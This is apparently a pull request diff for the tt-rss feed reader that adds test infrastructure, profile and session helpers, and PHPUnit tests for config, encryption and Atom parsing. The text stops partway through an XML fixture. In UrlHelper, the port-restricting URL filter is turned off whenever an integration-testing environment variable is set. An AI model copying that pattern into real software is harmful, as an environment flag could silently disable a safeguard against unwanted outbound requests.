### PR TITLE
 * add an arguable better new platform for functional & integrated tests

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -14,7 +14,7 @@ Thumbs.db
 /lock/*
 /.vscode/settings.json
 /vendor/**/.git
-/.phpunit.cache
+/.phpunit*cache
 /.phpstan-tmp
 /.rector-tmp
 /.tools/

--- a/classes/Config.php
+++ b/classes/Config.php
@@ -338,7 +338,8 @@ class Config {
 		//
 	}
 
-	function __construct() {
+    /** load data from environment variables */
+    function reload(): void {
 		$ref = new ReflectionClass(static::class);
 
 		foreach ($ref->getConstants() as $const => $cvalue) {
@@ -350,7 +351,31 @@ class Config {
 				$this->params[$cvalue] = [ self::cast_to($override !== false ? $override : $defval, $deftype), $deftype ];
 			}
 		}
-	}
+    }
+
+    /** this is primarily needed for tests, normally global config is not changed at runtime */
+    static function set(string $key, mixed $value): bool {
+        if (!getenv('IS_INTEGRATION_TESTING') && !getenv('IS_TESTING')) {
+            user_error("This method is only available for tests.", E_USER_WARNING);
+
+            return false;
+        } if (array_key_exists($key, self::_DEFAULTS)) {
+            list ($defval, $deftype) = self::_DEFAULTS[$key];
+
+            self::get_instance()->params[$key] = [self::cast_to($value, $deftype), $deftype];
+
+            return true;
+        } else {
+            user_error("Requested to set unknown global config variable: {$key}", E_USER_WARNING);
+
+            return false;
+        }
+    }
+
+    function __construct() {
+        $this->reload();
+    }
+
 
 	/** determine tt-rss version (using git)
 	 *

--- a/classes/Feeds.php
+++ b/classes/Feeds.php
@@ -1584,10 +1584,14 @@ class Feeds extends Handler_Protected {
 					$ssth->execute([$feed, $owner_uid]);
 					$row = $ssth->fetch();
 
-					$feed_title = $row["title"];
-					$feed_site_url = $row["site_url"];
-					$last_error = $row["last_error"];
-					$last_updated = $row["last_updated"];
+					if ($row) {
+						$feed_title = $row["title"];
+						$feed_site_url = $row["site_url"];
+						$last_error = $row["last_error"];
+						$last_updated = $row["last_updated"];
+					} else {
+						$feed_title = "Unknown feed ($feed)";
+					}
 				} else {
 					$feed_title = self::_get_title($feed, $owner_uid);
 				}

--- a/classes/Prefs.php
+++ b/classes/Prefs.php
@@ -184,6 +184,105 @@ class Prefs {
 		//
 	}
 
+	    /** @returns ID of profile if exists or -1 */
+	static function get_profile_id(int $owner_uid, string $title): int {
+		$sth = Db::pdo()->prepare("SELECT id FROM ttrss_settings_profiles
+			WHERE owner_uid = :uid AND title = :title");
+		$sth->execute(["uid" => $owner_uid, "title" => $title]);
+
+		if ($row = $sth->fetch(PDO::FETCH_ASSOC)) {
+			return (int) $row["id"];
+		}
+
+		return -1;
+	}
+
+	/** @returns true if profile_id exists for user */
+	static function profile_exists(int $owner_uid, int $profile_id): bool {
+		$sth = Db::pdo()->prepare("SELECT id FROM ttrss_settings_profiles
+			WHERE owner_uid = :uid AND id = :id");
+		$sth->execute(["uid" => $owner_uid, "id" => $profile_id]);
+
+		if ($row = $sth->fetch(PDO::FETCH_ASSOC)) {
+			return true;
+		}
+
+		return false;
+	}
+
+	/** @returns ID of created profile if successful, -1 otherwise */
+	static function create_profile(int $owner_uid, string $title): int {
+		if (self::get_profile_id($owner_uid, $title) != -1)
+			return -1;
+
+		$sth = Db::pdo()->prepare("INSERT INTO ttrss_settings_profiles (owner_uid, title) VALUES (:uid, :title)");
+
+		if ($sth->execute(["uid" => $owner_uid, "title" => $title])) {
+			return (int) Db::pdo()->lastInsertId();
+		}
+
+		return -1;
+	}
+
+	/** @returns ID of created profile if successful, -1 otherwise */
+	static function clone_profile(int $owner_uid, int $old_profile_id, string $new_title): int {
+
+		if (!self::profile_exists($owner_uid, $old_profile_id))
+			return -1;
+
+		$new_profile_id = self::create_profile($owner_uid, $new_title);
+
+		if ($new_profile_id <= 0) {
+			return -1;
+		}
+
+		$sth = Db::pdo()->prepare("INSERT INTO ttrss_user_prefs2
+			(owner_uid, pref_name, profile, value)
+			SELECT
+					:uid,
+					pref_name,
+					:new_profile,
+					value
+			FROM ttrss_user_prefs2
+			WHERE owner_uid = :uid AND profile = :old_profile");
+
+		$clone_res = $sth->execute([
+			"uid" => $owner_uid,
+			"new_profile" => $new_profile_id,
+			"old_profile" => $old_profile_id,
+		]);
+
+		if ($clone_res)
+			return $new_profile_id;
+		else
+			return -1;
+	}
+
+	static function remove_profile(int $owner_uid, int $profile_id): bool {
+		if (!self::profile_exists($owner_uid, $profile_id))
+			return false;
+
+		$sth = Db::pdo()->prepare("DELETE FROM ttrss_settings_profiles
+			WHERE owner_uid = :uid AND id = :id");
+
+		return $sth->execute(["uid" => $owner_uid, "id" => $profile_id]);
+	}
+
+	/** @param int[] $profile_ids
+	 * @param int $current_profile is not removed (if passed)
+	 */
+	static function remove_profiles(int $owner_uid, array $profile_ids, int $current_profile = 0): bool {
+		if (empty($profile_ids)) {
+			return false;
+		}
+
+		return ORM::for_table('ttrss_settings_profiles')
+			->where('owner_uid', $owner_uid)
+			->where_in('id', $profile_ids)
+			->where_not_equal('id', $current_profile)
+			->delete_many();
+	}
+
 	/**
 	 * @return array<int, array{pref_name: string, value: bool|int|string|null, type_hint: Config::T_*}>
 	 */

--- a/classes/Sessions.php
+++ b/classes/Sessions.php
@@ -49,6 +49,17 @@ class Sessions implements \SessionHandlerInterface {
 		return true;
 	}
 
+	public static function exists(string $id): bool {
+		$sth = Db::pdo()->prepare('SELECT COUNT(*) AS found FROM ttrss_sessions WHERE id=?');
+		$sth->execute([$id]);
+
+		if ($row = $sth->fetch()) {
+			return $row["found"] > 0;
+		} else {
+			return false;
+		}
+	}
+
 	public function read(string $id): false|string {
 		$sth = Db::pdo()->prepare('SELECT data FROM ttrss_sessions WHERE id=?');
 		$sth->execute([$id]);

--- a/classes/UrlHelper.php
+++ b/classes/UrlHelper.php
@@ -191,7 +191,7 @@ class UrlHelper {
 		if (filter_var($url_filter_var, FILTER_VALIDATE_URL) === false)
 			return false;
 
-		if ($extended_filtering) {
+		if (!getenv('IS_INTEGRATION_TESTING') && $extended_filtering) {
 			if (!in_array($tokens['port'] ?? '', [80, 443, '']))
 				return false;
 

--- a/package.json
+++ b/package.json
@@ -5,7 +5,9 @@
   "type": "module",
   "scripts": {
     "lint:css": "stylelint 'lib/flat-ttrss/**/*.css' 'plugins/**/*.css' 'themes/**/*.less'",
-    "lint:js": "eslint js plugins"
+    "lint:js": "eslint js plugins",
+    "phpunit": "XDEBUG_MODE=coverage ./vendor/bin/phpunit",
+    "phpunit:integration": "./tests_integration/run.sh"
   },
   "devDependencies": {
     "@stylistic/eslint-plugin": "^5.4.0",

--- a/phpunit.integration.xml
+++ b/phpunit.integration.xml
@@ -1,12 +1,13 @@
+<?xml version="1.0" encoding="UTF-8"?>
 <phpunit
     stderr="true"
     xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
     xsi:noNamespaceSchemaLocation="https://schema.phpunit.de/latest/phpunit.xsd"
-    bootstrap="tests_functional/bootstrap.php"
+    bootstrap="tests_integration/bootstrap.php"
     verbose="true">
     <testsuites>
-        <testsuite name="tests">
-            <directory>tests_functional</directory>
+        <testsuite name="integration">
+            <directory>tests_integration</directory>
         </testsuite>
     </testsuites>
     <coverage>
@@ -21,5 +22,6 @@
     </coverage>
     <php>
         <const name="IS_TESTING" value="true"/>
+        <const name="IS_INTEGRATION_TESTING" value="true"/>
     </php>
 </phpunit>

--- a/tests_functional/ConfigTest.php
+++ b/tests_functional/ConfigTest.php
@@ -1,0 +1,189 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+final class ConfigTest extends TestCase {
+    public function test_self_url_a(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_X_FORWARDED_PROTO"] = "http";
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/tt-rss/api/index.php";
+
+        $this->assertEquals(
+            'http://example.com/tt-rss',
+            Config::get_self_url(true)
+        );
+
+    }
+
+    public function test_self_url_b(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_X_FORWARDED_PROTO"] = "https";
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/api/";
+
+        $this->assertEquals(
+            'https://example.com',
+            Config::get_self_url(true)
+        );
+    }
+
+    public function test_self_url_c(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_X_FORWARDED_PROTO"] = "https";
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/api/index.php";
+
+        $this->assertEquals(
+            'https://example.com',
+            Config::get_self_url(true)
+        );
+    }
+
+    public function test_self_url_d(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_X_FORWARDED_PROTO"] = "https";
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/api//";
+
+        $this->assertEquals(
+            'https://example.com',
+            Config::get_self_url(true)
+        );
+    }
+
+    public function test_self_url_e(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_X_FORWARDED_PROTO"] = "https";
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/";
+
+        $this->assertEquals(
+            'https://example.com',
+            Config::get_self_url(true)
+        );
+    }
+
+    public function test_self_url_f(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/tt-rss/index.php";
+
+        $this->assertEquals(
+            'http://example.com/tt-rss',
+            Config::get_self_url(true)
+        );
+    }
+
+    public function test_self_url_g(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/tt-rss/";
+
+        $this->assertEquals(
+            'http://example.com/tt-rss',
+            Config::get_self_url(true)
+        );
+    }
+
+    public function test_self_url_h(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/tt-rss";
+
+        $this->assertEquals(
+            'http://example.com/tt-rss',
+            Config::get_self_url(true)
+        );
+    }
+
+    public function test_self_url_i(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/tt-rss////plugins.local/example///api/long path/test.php";
+
+        $this->assertEquals(
+            'http://example.com/tt-rss',
+            Config::get_self_url(true)
+        );
+    }
+
+    public function test_self_url_j(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/tt-rss/plugins.local/example/api/longpath/test.php/reader/api/0/stream/items/ids?n=1000&output=json&s=user/-/state/com.google/starred";
+
+        $this->assertEquals(
+            'http://example.com/tt-rss',
+            Config::get_self_url(true)
+        );
+    }
+
+    public function test_self_url_k(): void {
+        $_SERVER = [];
+
+        $_SERVER["HTTP_HOST"] = "example.com";
+        $_SERVER["REQUEST_URI"] = "/tt-rss/plugins/example/api/longpath/test.php/reader/api/0/stream/items/ids?n=1000&output=json&s=user/-/state/com.google/starred";
+
+        $this->assertEquals(
+            'http://example.com/tt-rss',
+            Config::get_self_url(true)
+        );
+    }
+
+    public function test_get_self_dir(): void {
+        $this->assertEquals(
+            dirname(__DIR__), # we're in (app)/tests/
+            Config::get_self_dir()
+        );
+    }
+
+    public function test_cast_to_int(): void {
+        // basic integers
+        $this->assertSame(42, Config::cast_to("42", Config::T_INT));
+        $this->assertSame(0, Config::cast_to("0", Config::T_INT));
+        $this->assertSame(-7, Config::cast_to("-7", Config::T_INT));
+
+        // string coercion to int
+        $this->assertSame(0, Config::cast_to("", Config::T_INT));
+        $this->assertSame(123, Config::cast_to("123abc", Config::T_INT));
+        $this->assertSame(0, Config::cast_to("abc", Config::T_INT));
+
+        // float-like strings
+        $this->assertSame(3, Config::cast_to("3.14", Config::T_INT));
+    }
+
+    public function test_cast_to_string(): void {
+        // T_STRING is the default, value passes through unchanged
+        $this->assertSame("hello", Config::cast_to("hello", Config::T_STRING));
+        $this->assertSame("0", Config::cast_to("0", Config::T_STRING));
+        $this->assertSame("", Config::cast_to("", Config::T_STRING));
+        $this->assertSame("false", Config::cast_to("false", Config::T_STRING));
+        $this->assertSame("42", Config::cast_to("42", Config::T_STRING));
+    }
+
+    public function test_cast_to_bool(): void {
+        // truthy values
+        $this->assertTrue(Config::cast_to("true", Config::T_BOOL));
+        $this->assertTrue(Config::cast_to("1", Config::T_BOOL));
+        $this->assertTrue(Config::cast_to("t", Config::T_BOOL));
+        $this->assertTrue(Config::cast_to("yes", Config::T_BOOL));
+        $this->assertTrue(Config::cast_to("on", Config::T_BOOL));
+        $this->assertTrue(Config::cast_to("anything", Config::T_BOOL));
+
+        // falsy values
+        $this->assertFalse(Config::cast_to("false", Config::T_BOOL));
+        $this->assertFalse(Config::cast_to("f", Config::T_BOOL));
+        $this->assertFalse(Config::cast_to("0", Config::T_BOOL));
+        $this->assertFalse(Config::cast_to("", Config::T_BOOL));
+    }
+}

--- a/tests_functional/CryptTest.php
+++ b/tests_functional/CryptTest.php
@@ -1,0 +1,246 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+final class CryptTest extends TestCase {
+
+    /**
+     * Set a value in the Config singleton.
+     */
+    private function setConfigParam(string $param, string $value): void {
+        Config::set($param, $value);
+    }
+
+    /**
+     * Ensure the Config singleton is in a clean state before each test.
+     */
+    private function resetConfig(): void {
+        Config::set('ENCRYPTION_KEY', '');
+    }
+
+    public function test_generate_key_returns_valid_length(): void {
+        $key = Crypt::generate_key();
+
+        // xchacha20-poly1305 uses a 256-bit (32-byte) key
+        $this->assertSame(32, strlen($key));
+        // key should be raw binary data (not hex-encoded)
+        $this->assertNotEquals(bin2hex($key), $key, 'Key should be binary, not hex-encoded');
+    }
+
+    public function test_generate_key_produces_unique_keys(): void {
+        $key1 = Crypt::generate_key();
+        $key2 = Crypt::generate_key();
+
+        $this->assertNotSame($key1, $key2, 'Two generated keys should be unique');
+    }
+
+    public function test_encrypt_string_requires_encryption_key(): void {
+        $this->resetConfig();
+
+        $this->expectException(Exception::class);
+        $this->expectExceptionMessage('Crypt::encrypt_string() failed to encrypt - key is not available');
+
+        Crypt::encrypt_string('sensitive data');
+    }
+
+    public function test_encrypt_string_returns_valid_structure(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $encrypted = Crypt::encrypt_string('hello world');
+
+        $this->assertArrayHasKey('algo', $encrypted);
+        $this->assertArrayHasKey('nonce', $encrypted);
+        $this->assertArrayHasKey('payload', $encrypted);
+        $this->assertSame('xchacha20poly1305_ietf', $encrypted['algo']);
+        // nonce should be the correct length for xchacha20poly1305_ietf (24 bytes)
+        $this->assertSame(24, strlen($encrypted['nonce']));
+        // payload should be non-empty binary data
+        $this->assertNotEmpty($encrypted['payload']);
+    }
+
+    public function test_encrypt_string_with_empty_string(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $encrypted = Crypt::encrypt_string('');
+
+        $this->assertSame('xchacha20poly1305_ietf', $encrypted['algo']);
+        $this->assertNotEmpty($encrypted['payload']);
+    }
+
+    public function test_encrypt_string_with_unicode(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $original = 'こんにちは世界 🌍 Привет мир';
+        $encrypted = Crypt::encrypt_string($original);
+
+        $this->assertNotEmpty($encrypted['payload']);
+    }
+
+    public function test_encrypt_string_with_large_payload(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $largeData = str_repeat('A', 100000);
+        $encrypted = Crypt::encrypt_string($largeData);
+
+        $this->assertNotEmpty($encrypted['payload']);
+    }
+
+    public function test_decrypt_string_requires_encryption_key(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $encrypted = Crypt::encrypt_string('test data');
+
+        // Now clear the key
+        $this->setConfigParam('ENCRYPTION_KEY', '');
+
+        $this->expectException(Exception::class);
+        $this->expectExceptionMessage('Crypt::decrypt_string() failed to decrypt - key is not available');
+
+        Crypt::decrypt_string($encrypted);
+    }
+
+    public function test_decrypt_string_with_wrong_algo(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $badEncrypted = [
+            'algo' => 'unsupported_algo',
+            'nonce' => random_bytes(24),
+            'payload' => random_bytes(64),
+        ];
+
+        $this->expectException(Exception::class);
+        $this->expectExceptionMessageMatches('/unsupported algo: unsupported_algo/');
+
+        Crypt::decrypt_string($badEncrypted);
+    }
+
+    public function test_decrypt_string_roundtrip(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $original = 'hello world';
+        $encrypted = Crypt::encrypt_string($original);
+        $decrypted = Crypt::decrypt_string($encrypted);
+
+        $this->assertSame($original, $decrypted);
+    }
+
+    public function test_decrypt_string_roundtrip_with_unicode(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $original = 'こんにちは世界 🌍 Привет мир 你好世界';
+        $encrypted = Crypt::encrypt_string($original);
+        $decrypted = Crypt::decrypt_string($encrypted);
+
+        $this->assertSame($original, $decrypted);
+    }
+
+    public function test_decrypt_string_roundtrip_with_empty_string(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $original = '';
+        $encrypted = Crypt::encrypt_string($original);
+        $decrypted = Crypt::decrypt_string($encrypted);
+
+        $this->assertSame($original, $decrypted);
+    }
+
+    public function test_decrypt_string_roundtrip_with_large_payload(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $original = str_repeat('A', 100000);
+        $encrypted = Crypt::encrypt_string($original);
+        $decrypted = Crypt::decrypt_string($encrypted);
+
+        $this->assertSame($original, $decrypted);
+    }
+
+    public function test_decrypt_string_fails_with_tampered_payload(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $encrypted = Crypt::encrypt_string('secret message');
+
+        // Tamper with the payload by appending bytes (changes the auth tag)
+        $tampered = $encrypted;
+        $tampered['payload'] .= 'XX';
+
+        // sodium_crypto_aead_xchacha20poly1305_ietf_decrypt returns false on tampered data,
+        // which PHP coerces to '' due to the string return type
+        $result = Crypt::decrypt_string($tampered);
+        $this->assertSame('', $result, 'Tampered ciphertext should return empty string');
+    }
+
+    public function test_decrypt_string_fails_with_tampered_nonce(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $encrypted = Crypt::encrypt_string('secret message');
+
+        // Tamper with the nonce (append a byte to change it)
+        $tampered = $encrypted;
+        $tampered['nonce'] = $encrypted['nonce'] . 'XX';
+
+        $this->expectException(\SodiumException::class);
+
+        Crypt::decrypt_string($tampered);
+    }
+
+    public function test_encrypt_string_with_different_keys_produces_different_ciphertext(): void {
+        $key1 = bin2hex(Crypt::generate_key());
+        $key2 = bin2hex(Crypt::generate_key());
+
+        $this->setConfigParam('ENCRYPTION_KEY', $key1);
+        $encrypted1 = Crypt::encrypt_string('same plaintext');
+
+        $this->setConfigParam('ENCRYPTION_KEY', $key2);
+        $encrypted2 = Crypt::encrypt_string('same plaintext');
+
+        // Different keys should produce different ciphertext
+        $this->assertNotSame($encrypted1, $encrypted2);
+
+        // But each should decrypt correctly with its own key
+        $this->setConfigParam('ENCRYPTION_KEY', $key1);
+        $this->assertSame('same plaintext', Crypt::decrypt_string($encrypted1));
+
+        $this->setConfigParam('ENCRYPTION_KEY', $key2);
+        $this->assertSame('same plaintext', Crypt::decrypt_string($encrypted2));
+    }
+
+    public function test_encrypt_decrypt_same_key_different_calls(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        // Multiple encrypt/decrypt cycles with the same key
+        for ($i = 0; $i < 5; $i++) {
+            $original = "message $i";
+            $encrypted = Crypt::encrypt_string($original);
+            $decrypted = Crypt::decrypt_string($encrypted);
+            $this->assertSame($original, $decrypted, "Roundtrip failed on iteration $i");
+        }
+    }
+
+    public function test_decrypt_string_with_invalid_payload(): void {
+        $key = bin2hex(Crypt::generate_key());
+        $this->setConfigParam('ENCRYPTION_KEY', $key);
+
+        $invalidData = [
+            'algo' => 'xchacha20poly1305_ietf',
+            'nonce' => random_bytes(24),
+            'payload' => 'not-valid-ciphertext',
+        ];
+
+        // Invalid ciphertext should return empty string (false coerced by string return type)
+        $result = Crypt::decrypt_string($invalidData);
+        $this->assertSame('', $result, 'Invalid ciphertext should return empty string');
+    }
+
+}

--- a/tests_functional/FeedItemAtomTest.php
+++ b/tests_functional/FeedItemAtomTest.php
@@ -1,0 +1,959 @@
+<?php
+use PHPUnit\Framework\TestCase;
+
+/**
+ * Tests for FeedItem_Atom-specific methods (get_id, get_date, get_link,
+ * get_content, get_description, get_categories, get_enclosures, get_language).
+ *
+ * FeedItem_Atom extends FeedItem_Common; tests here focus on Atom-specific
+ * parsing behavior not covered by FeedParserTest (which tests feed-level
+ * methods) or FeedItemCommonTest (which tests shared methods).
+ */
+final class FeedItemAtomTest extends TestCase {
+
+    // =========================================================================
+    // Fixtures — get_id()
+    // =========================================================================
+
+    private const ATOM1_ITEM_WITH_ID = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>With ID</title>
+    <link href="https://example.com/1" rel="alternate"/>
+    <id>urn:uuid:abc123</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_NO_ID = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>No ID</title>
+    <link href="https://example.com/2" rel="alternate"/>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_ID_WITH_WHITESPACE = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Whitespace ID</title>
+    <link href="https://example.com/3" rel="alternate"/>
+    <id>  urn:uuid:whitespace  </id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // Fixtures — get_date()
+    // =========================================================================
+
+    private const ATOM1_ITEM_UPDATED = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Updated Date</title>
+    <link href="https://example.com/4" rel="alternate"/>
+    <id>id-4</id>
+    <updated>2024-01-15T10:30:00Z</updated>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_PUBLISHED = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Published Date</title>
+    <link href="https://example.com/5" rel="alternate"/>
+    <id>id-5</id>
+    <published>2023-06-20T08:00:00Z</published>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_BOTH_UPDATED_AND_PUBLISHED = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Both Dates</title>
+    <link href="https://example.com/6" rel="alternate"/>
+    <id>id-6</id>
+    <updated>2024-03-01T12:00:00Z</updated>
+    <published>2023-01-01T00:00:00Z</published>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_DC_DATE = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom"
+      xmlns:dc="http://purl.org/dc/elements/1.1/">
+  <title>Test</title>
+  <entry>
+    <title>DC Date</title>
+    <link href="https://example.com/7" rel="alternate"/>
+    <id>id-7</id>
+    <dc:date>2022-11-11T00:00:00Z</dc:date>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_NO_DATE = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>No Date</title>
+    <link href="https://example.com/8" rel="alternate"/>
+    <id>id-8</id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // Fixtures — get_link()
+    // =========================================================================
+
+    private const ATOM1_ITEM_LINK_ALTERNATE = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Link Alternate</title>
+    <link href="https://example.com/9/alt" rel="alternate"/>
+    <id>id-9</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_LINK_STANDOUT = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Link Standout</title>
+    <link href="https://example.com/10/standout" rel="standout"/>
+    <id>id-10</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_LINK_NO_REL = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Link No Rel</title>
+    <link href="https://example.com/11"/>
+    <id>id-11</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_LINK_SELF_IGNORED = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Link Self Ignored</title>
+    <link href="https://example.com/12/self" rel="self"/>
+    <link href="https://example.com/12/alternate" rel="alternate"/>
+    <id>id-12</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_NO_LINK = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>No Link</title>
+    <id>id-13</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_XML_BASE = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom" xml:base="https://example.com/base/">
+  <title>Test</title>
+  <entry>
+    <title>XML Base</title>
+    <link href="relative/path" rel="alternate"/>
+    <id>id-14</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_LINK_WHITESPACE = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Link Whitespace</title>
+    <link href="  https://example.com/15/trimmed  " rel="alternate"/>
+    <id>id-15</id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // Fixtures — get_title()
+    // =========================================================================
+
+    private const ATOM1_ITEM_TITLE_WITH_WHITESPACE = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>  Title With Spaces  </title>
+    <link href="https://example.com/16" rel="alternate"/>
+    <id>id-16</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_TITLE_EMPTY = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title></title>
+    <link href="https://example.com/17" rel="alternate"/>
+    <id>id-17</id>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_TITLE_ENTITY = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Entity &amp;amp; &lt;test&gt;</title>
+    <link href="https://example.com/18" rel="alternate"/>
+    <id>id-18</id>
+  </entry>
+</feed>';
+
+    // =========================================================================
+    // Fixtures — get_content()
+    // =========================================================================
+
+    private const ATOM1_ITEM_CONTENT_TEXT = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Content Text</title>
+    <link href="https://example.com/19" rel="alternate"/>
+    <id>id-19</id>
+    <content type="text">Plain text content</content>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_CONTENT_HTML = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Content HTML</title>
+    <link href="https://example.com/20" rel="alternate"/>
+    <id>id-20</id>
+    <content type="html">&lt;p&gt;HTML &lt;strong&gt;content&lt;/strong&gt;&lt;/p&gt;</content>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_CONTENT_XHTML = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>Content XHTML</title>
+    <link href="https://example.com/21" rel="alternate"/>
+    <id>id-21</id>
+    <content type="xhtml" xmlns="http://www.w3.org/1999/xhtml">
+      <div xmlns="http://www.w3.org/1999/xhtml">
+        <p>XHTML content</p>
+      </div>
+    </content>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_CONTENT_WITH_BASE = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom" xml:base="https://cdn.example.com/">
+  <title>Test</title>
+  <entry>
+    <title>Content With Base</title>
+    <link href="https://example.com/22" rel="alternate"/>
+    <id>id-22</id>
+    <content type="text">&lt;img src="images/photo.jpg"/&gt;</content>
+  </entry>
+</feed>';
+
+    private const ATOM1_ITEM_NO_CONTENT = '<?xml version="1.0" encoding="UTF-8"?>
+<feed xmlns="http://www.w3.org/2005/Atom">
+  <title>Test</title>
+  <entry>
+    <title>No Content</title>
+    <link href="https://example.com/23" rel="alternate"/>
